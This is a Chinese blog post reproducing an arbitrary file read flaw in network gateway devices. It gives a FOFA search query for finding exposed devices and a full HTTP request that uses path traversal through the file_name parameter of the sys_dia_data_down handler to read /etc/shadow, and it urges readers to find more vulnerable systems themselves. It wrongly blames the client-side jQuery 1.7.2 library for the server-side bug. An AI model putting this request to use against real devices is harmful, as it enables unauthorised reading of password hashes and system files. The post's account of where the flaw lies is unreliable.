jQuery-1.7.2存在任意文件读取漏洞

已于 2023-12-27 18:34:49 修改
阅读量1.7k 收藏 10
点赞数 9
分类专栏: 漏洞复现 文章标签: jquery 漏洞复现 web安全 任意文件读取
于 2023-12-27 18:22:07 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/xiayu729100940/article/details/135252686
版权
jQuery1.7.2版本的sys_dia_data_down模块存在高危任意文件读取漏洞,攻击者可通过构造特定请求读取服务器文件。许多依赖此版本的网关系统易受攻击,包括飞鱼星防火墙和任天行管理系统。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

jQuery是一个快速、简洁的JavaScript框架,是一个丰富的JavaScript代码库,其1.7.2版本的sys_dia_data_down模块存在任意文件读取漏洞,攻击者可通过前台读取任意文件。

1.漏洞级别

高危

2.漏洞搜索

fofa

body="webui/js/jquerylib/jquery-1.7.2.min.js"

3.影响范围

jQuery-1.7.2

4.漏洞复现

我们以使用该插件的安博通网关为例:
构造

GET /webui/?file_name=../../../../../etc/shadow&g=sys_dia_data_down HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: USGSESSID=ddc4875e875c49403c35ccfbcef07db1
Upgrade-Insecure-Requests: 1

返回内容即为文件内容:
在这里插入图片描述不难看出file_name就是控制文件路径的参数,我们可以简单的得出访问任意文件的构造访问

file_name=../../../../../etc/shadow. =/etc/shadow
file_name=../../../../../bin/bash  =/bin/bash

漏洞相对比较简单。

5.后话

因为jquery是个非常常用的插件,所以很多饮用该版本的系统都会存在漏洞,大量的网关系统就因此中招了,已知的就有这些。

    如:
    飞鱼星下一代防火墙安全网关;/任天行网络安全管理系统;等等很多很多。有兴趣大家可以自己找找看。

后续还会随文章附赠一个简单的利用脚本,如果有问题欢迎随时沟通~
在这里插入图片描述

漏洞复现jquery-1.7.2JavaScript代码库任意文件读取
失心少年
01-06 905
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。本文所提供的工具仅用于学习,禁止用于其他!H3C安全接入网关使用jquery-1.7.2JavaScript代码库(框架),jQuery 1.7.2版本存在任意文件读取漏洞。除此之外,像安博通深度安全网关等使用jquery-1.7.2 JavaScript代码库(框架)的设备同样存在漏洞
漏洞复现jQuery-1.7.2 版本任意文件下载漏洞复现
李火火的安全圈
04-27 2465
jQuery是一个快速、简洁的JavaScript框架,是继Prototype之后一个优秀的JavaScript代码库(框架) 于2006年1月由John Resig发布。 jQuery设计的宗旨是 " write Less,Do More" ,即倡导写更少的代码,做更多的事情。它封装JavaScript常用的功能代码,提供一种简便的JavaScript设计模式,优化HTML文档操作、时间处理、动画设计和Ajax交互。
jQuery-1.7.2任意文件读取漏洞验证利用脚本
04-27
jQuery是一个快速、简洁的JavaScript框架,丰富的Javascript代码库,在其1.7.2版本的sys_dia_data_down模块存在任意文件读取漏洞,攻击者可通过前台读取任意文件
jQuery最新xss漏洞浅析、复现、修复
最新发布
m0_59598029的博客
03-20 794
形成:xss漏洞也叫跨站点脚本编制,形成的原因简单说就是应用程序未对用户可控制的输入正确进行无害化处理,就将其放置到充当 Web 页面的输出中。这可被跨站点脚本编制攻击利用。危害:一旦注入恶意脚本后,攻击者就能够执行各种恶意活动。攻击者可能将私有信息(例如可能包含会话信息的 cookie)从受害者的机器传输给攻击者。攻击者可能以受害者的身份将恶意请求发送到Web 站点,如果受害者具有管理该站点的管理员特权,这可能对站点尤其危险。
jQuery-1.7.2版本存在任意文件读取漏洞
nnn2188185的博客
04-23 2033
jQuery是一个快速、简洁的JavaScript框架,是一个丰富的JavaScript代码库,其1.7.2版本的sys_dia_data_down模块存在任意文件读取漏洞,攻击者可通过前台读取任意文件
jquery-1.7.2.min.js XSS漏洞
ZPFCD的博客
01-19 2760
JQuery 1.7.2.min.js存在xss漏洞
JQuery-1.7.2.min.js跨站脚本漏洞
weixin_33769125的博客
02-15 5307
测试页面:<!DOCTYPE html><html><head><script src="http://x.x.x.x:80/js/jquery-1.7.2.min.js"></script> <meta charset="utf-8"> <title>JS Bin</title&g...
jQuery-1.7.2漏洞利用与任意文件读取防范
在给出的文件信息中,提到了一个名为“jQuery-1.7.2任意文件读取漏洞验证利用脚本”的文件。这个脚本很可能包含以下功能: 1. **请求构造**:脚本能够根据攻击者的输入,构造出特定格式的HTTP请求,这些请求能够被...
jQuery 的“原型污染”安全漏洞
weixin_33946605的博客
04-22 534
百度智能云·域名服务,.com新用户首购仅需25元 前两周发布的 jQuery 3.4.0 除了常规更新外,更...
jQuery漏洞——CVE-2020-11022/CVE-2020-11023,保姆篇---春不晚
weixin_71913298的博客
12-11 3569
实践是检验真理的唯一标准,请大家积极实践 请大家指出的我问题和需要完善的地方,咱们共同进步 清风.春不晚与诸君共勉,共创辉煌篇章
jQuery-with-XSS 检测jQuery版本是否存在XSS漏洞
09-29
网站中包含大量的动态内容以提高用户体验,比过去要复杂得多。所谓动态内容,就是根据用户环境和需要,Web应用程序能够输出相应的内容。动态站点会受到一种名为“跨站脚本攻击”(Cross Site Scripting, 安全专家们通常将其缩写成XSS,原本应当是css,但为了和层叠样式表(Cascading Style Sheet,CSS )有所区分,故称XSS)的威胁,而静态站点则完全不受其影响。
jQuery-XSS漏洞(CVE-2020-11022/CVE-2020-11023)
热门推荐
1stPeak's Blog
03-25 2万+
jQuery-XSS漏洞(CVE-2020-11022/CVE-2020-11023)
学“狂飙”的网络安全,做最强盛的打工人!!
Karka_的博客
03-18 436
*刚刚结课,就有学员找到了14K的薪资。**课程虽已结束,但我们的结业帮扶持续进行。束,但我们的结业帮扶持续进行。
Jquery XSS漏洞(CVE-2020-11022
jammny
02-04 2万+
漏洞详情 jQuery是美国John Resig程序员的一套开源、跨浏览器的JavaScript库。 jQuery 大于或等于1.2至3.5.0的版本中存在跨站脚本漏洞,该漏洞源于WEB应用缺少对客户端数据的正确验证。即使执行sanitize处理,也仍会执行将来自不受信任来源的HTML传递给jQuery的DOM操作方法(即html()、.append()等),攻击者可利用该漏洞执行客户端代码。 漏洞影响 V 1.2.0 <= jquery < V 3.5.0 漏洞分析 在html()方
海康威视安全接入网关 任意文件读取漏洞复现
m0_61869253的博客
03-03 1096
海康威视安全接入网关使用Jquery-1.7.2 , 该版本存在任意文件读取漏洞,可获取服务器内部敏感信息泄露(安博通应用网关也存在漏洞
JQuery-XSS漏洞(CVE-2020-11022/CVE-2020-11023)漏洞复现
一纸荒芜的博客
10-31 2万+
jquery-xss漏洞复现
JQuery跨站脚本漏洞
qq274575499的博客
04-02 4129
jQuery 3.4.0之前版本中存在跨站脚本漏洞,该漏洞源于WEB应用缺少对客户端数据的正确验证。攻击者可利用该漏洞执行客户端代码。
深入解析jQuery-XSS漏洞安全防护与技术应用
gitblog_06578的博客
09-20 2217
深入解析jQuery-XSS漏洞安全防护与技术应用 jQuery-XSS漏洞CVE-2020-11022CVE-2020-11023 项目地址: https://gitcode.com/Resource-Bundle-Coll...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值